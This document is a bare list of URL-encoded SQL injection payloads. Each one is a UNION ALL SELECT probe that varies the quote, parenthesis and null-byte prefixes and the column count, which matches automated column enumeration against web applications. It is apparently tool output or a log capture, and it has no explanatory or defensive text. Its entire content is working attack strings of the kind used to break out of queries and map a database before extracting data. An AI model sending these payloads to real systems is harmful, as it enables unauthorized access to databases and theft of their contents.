-7595%22%29%29%20UNION%20ALL%20SELECT%209546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546--%20 -9080%22%29%29%20UNION%20ALL%20SELECT%207362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362--%20 -3599%22%29%29%20UNION%20ALL%20SELECT%202465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465%2C2465--%20 -6481%22%29%29%20UNION%20ALL%20SELECT%204904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904%2C4904--%20 -5439%22%29%29%29%20UNION%20ALL%20SELECT%201046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046%2C1046--%20 -3905%22%29%29%29%20UNION%20ALL%20SELECT%207788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788--%20 -7759%22%29%29%29%20UNION%20ALL%20SELECT%206325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325%2C6325--%20 -9678%22%29%29%29%20UNION%20ALL%20SELECT%208187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187--%20 -2481%22%29%29%29%20UNION%20ALL%20SELECT%209545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545%2C9545--%20 -3055%22%29%29%29%20UNION%20ALL%20SELECT%201359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359%2C1359--%20 -4549%22%29%29%29%20UNION%20ALL%20SELECT%203825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825%2C3825--%20 -8521%22%29%29%29%20UNION%20ALL%20SELECT%208897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897%2C8897--%20 -3790%22%29%29%29%20UNION%20ALL%20SELECT%206906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906%2C6906--%20 -2652%22%29%29%29%20UNION%20ALL%20SELECT%206966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966%2C6966--%20 -8712%22%20UNION%20ALL%20SELECT%204538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538%2C4538--%20 -8412%22%20UNION%20ALL%20SELECT%207648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648%2C7648--%20 -9104%22%20UNION%20ALL%20SELECT%208472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472%2C8472--%20 -3711%22%20UNION%20ALL%20SELECT%205340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340%2C5340--%20 -1158%22%20UNION%20ALL%20SELECT%201580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580%2C1580--%20 -3290%22%20UNION%20ALL%20SELECT%203535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535%2C3535--%20 -5144%22%20UNION%20ALL%20SELECT%204031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031%2C4031--%20 -7678%22%20UNION%20ALL%20SELECT%208767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767%2C8767--%20 -2045%22%20UNION%20ALL%20SELECT%202933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933%2C2933--%20 -4251%22%20UNION%20ALL%20SELECT%208060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060--%20 -4656%25%27%29%20UNION%20ALL%20SELECT%209702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702%2C9702--%20 -6542%25%27%29%20UNION%20ALL%20SELECT%201318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318%2C1318--%20 -8172%25%27%29%20UNION%20ALL%20SELECT%207866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866--%20 -2008%25%27%29%20UNION%20ALL%20SELECT%204795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795%2C4795--%20 -8849%25%27%29%20UNION%20ALL%20SELECT%202495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495--%20 -7590%25%27%29%20UNION%20ALL%20SELECT%209323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323%2C9323--%20 -3401%25%27%29%20UNION%20ALL%20SELECT%202196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196--%20 -5139%25%27%29%20UNION%20ALL%20SELECT%209522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522%2C9522--%20 -2006%25%27%29%20UNION%20ALL%20SELECT%203168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168--%20 -2563%25%27%29%20UNION%20ALL%20SELECT%209305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305--%20 -8425%25%27%29%29%20UNION%20ALL%20SELECT%206526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526%2C6526--%20 -2694%25%27%29%29%20UNION%20ALL%20SELECT%208498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498--%20 -5141%25%27%29%29%20UNION%20ALL%20SELECT%205163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163%2C5163--%20 -6227%25%27%29%29%20UNION%20ALL%20SELECT%207053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053--%20 -5241%25%27%29%29%20UNION%20ALL%20SELECT%202534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534%2C2534--%20 -2725%25%27%29%29%20UNION%20ALL%20SELECT%201896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896%2C1896--%20 -7099%25%27%29%29%20UNION%20ALL%20SELECT%206598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598%2C6598--%20 -8923%25%27%29%29%20UNION%20ALL%20SELECT%208587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587%2C8587--%20 -8562%25%27%29%29%20UNION%20ALL%20SELECT%208595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595%2C8595--%20 -2876%25%27%29%29%20UNION%20ALL%20SELECT%208958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958%2C8958--%20 -7572%25%27%29%29%29%20UNION%20ALL%20SELECT%204356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356%2C4356--%20 -5137%25%27%29%29%29%20UNION%20ALL%20SELECT%206632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632--%20 -1425%25%27%29%29%29%20UNION%20ALL%20SELECT%201853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853%2C1853--%20 -3075%25%27%29%29%29%20UNION%20ALL%20SELECT%205446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446%2C5446--%20 -3817%25%27%29%29%29%20UNION%20ALL%20SELECT%207455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455%2C7455--%20 -9814%25%27%29%29%29%20UNION%20ALL%20SELECT%201153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153%2C1153--%20 -9209%25%27%29%29%29%20UNION%20ALL%20SELECT%208026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026%2C8026--%20 -6572%25%27%29%29%29%20UNION%20ALL%20SELECT%205565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565%2C5565--%20 -9349%25%27%29%29%29%20UNION%20ALL%20SELECT%202528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528%2C2528--%20 -5004%25%27%29%29%29%20UNION%20ALL%20SELECT%203902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902%2C3902--%20 -4235%25%27%20UNION%20ALL%20SELECT%207184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184--%20 -5806%25%27%20UNION%20ALL%20SELECT%202237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237--%20 -7313%25%27%20UNION%20ALL%20SELECT%207100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100%2C7100--%20 -3774%25%27%20UNION%20ALL%20SELECT%205878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878--%20 -8426%25%27%20UNION%20ALL%20SELECT%201786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786%2C1786--%20 -2427%25%27%20UNION%20ALL%20SELECT%201986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986%2C1986--%20 -3786%25%27%20UNION%20ALL%20SELECT%207690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690--%20 -1055%25%27%20UNION%20ALL%20SELECT%209481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481%2C9481--%20 -1852%25%27%20UNION%20ALL%20SELECT%204964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964%2C4964--%20 -3479%25%27%20UNION%20ALL%20SELECT%206074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074%2C6074--%20 -4838%00%27%29%20UNION%20ALL%20SELECT%209324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324%2C9324--%20 -3053%00%27%29%20UNION%20ALL%20SELECT%208208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208%2C8208--%20 -4286%00%27%29%20UNION%20ALL%20SELECT%205959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959%2C5959--%20 -6470%00%27%29%20UNION%20ALL%20SELECT%207703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703%2C7703--%20 -9250%00%27%29%20UNION%20ALL%20SELECT%208539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539%2C8539--%20 -8210%00%27%29%20UNION%20ALL%20SELECT%208828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828--%20 -9021%00%27%29%20UNION%20ALL%20SELECT%205434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434--%20 -5043%00%27%29%20UNION%20ALL%20SELECT%205210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210%2C5210--%20 -5117%00%27%29%20UNION%20ALL%20SELECT%202151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151%2C2151--%20 -2205%00%27%29%20UNION%20ALL%20SELECT%205339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339--%20 -2479%00%27%20UNION%20ALL%20SELECT%201267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267%2C1267--%20 -9491%00%27%20UNION%20ALL%20SELECT%204355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355--%20 -5189%00%27%20UNION%20ALL%20SELECT%209563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563%2C9563--%20 -2430%00%27%20UNION%20ALL%20SELECT%205179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179--%20 -8372%00%27%20UNION%20ALL%20SELECT%204250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250--%20 -4405%00%27%20UNION%20ALL%20SELECT%205838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838%2C5838--%20 -1449%00%27%20UNION%20ALL%20SELECT%203670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670--%20 -4374%00%27%20UNION%20ALL%20SELECT%204763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763--%20 -7858%00%27%20UNION%20ALL%20SELECT%207309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309%2C7309--%20 -7313%00%27%20UNION%20ALL%20SELECT%207412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412%2C7412--%20 -5348%27%29%20WHERE%208164%3D8164%20UNION%20ALL%20SELECT%208164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164%2C8164--%20 -3804%27%29%20WHERE%208726%3D8726%20UNION%20ALL%20SELECT%208726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726%2C8726--%20 -2707%27%29%20WHERE%206377%3D6377%20UNION%20ALL%20SELECT%206377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377--%20 -2721%27%29%20WHERE%203220%3D3220%20UNION%20ALL%20SELECT%203220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220--%20 -2568%27%29%20WHERE%207889%3D7889%20UNION%20ALL%20SELECT%207889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889%2C7889--%20 -2931%27%29%20WHERE%208228%3D8228%20UNION%20ALL%20SELECT%208228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228%2C8228--%20 -7545%27%29%20WHERE%205755%3D5755%20UNION%20ALL%20SELECT%205755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755%2C5755--%20 -9759%27%29%20WHERE%205204%3D5204%20UNION%20ALL%20SELECT%205204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204%2C5204--%20 -7695%27%29%20WHERE%201130%3D1130%20UNION%20ALL%20SELECT%201130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130--%20 -5559%27%29%20WHERE%207449%3D7449%20UNION%20ALL%20SELECT%207449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449%2C7449--%20 -6545%22%29%20WHERE%204114%3D4114%20UNION%20ALL%20SELECT%204114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114%2C4114--%20 -6800%22%29%20WHERE%206408%3D6408%20UNION%20ALL%20SELECT%206408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408%2C6408--%20 